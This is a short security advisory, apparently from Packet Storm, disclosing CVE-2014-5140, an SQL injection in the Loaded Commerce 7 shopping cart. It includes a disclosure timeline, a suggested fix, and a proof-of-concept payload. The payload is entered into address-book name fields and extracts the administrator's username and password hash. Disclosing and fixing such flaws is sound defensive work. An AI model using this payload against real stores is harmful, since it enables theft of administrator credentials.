Loaded Commerce 7 Shopping Cart SQL Injection

2014-09-08T00:00:00
ID PACKETSTORM:128183
Type packetstorm
Reporter Breaking Technology Research Labs
Modified 2014-09-08T00:00:00

Description

                                        
                                            `Title: LoadedCommerce7 Systemic Query Factory Vulnerability  
  
Advisory: http://breaking.technology/advisories/CVE-2014-5140.txt  
  
Credits: Discovered by Breaking Technology Research Labs 2014-06-30  
  
Reference: CVE-2014-5140 - Assigned 31 June 2014  
  
Timeline:  
Vendor notified - 29 July 2014  
Vendor confirmed exploit 30 July 2014  
  
  
Severity: Critical  
Attack Complexity: Minimal  
Classification: SQL injection, unsafe string replacement  
  
Description:  
  
Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.  
  
Proof of Concept:  
  
Have a valid customer account and create a new contact in your address book using the following values.  
  
  
First name: :entry_lastname,  
Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#  
  
The new contact will be added to your address book with the admin hash as the contact's street address  
  
Suggested Fix:  
Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value. A similar fix was issued for tomatocart, available at  
https://github.com/tomatocart/TomatoCart-v1/pull/238  
  
  
`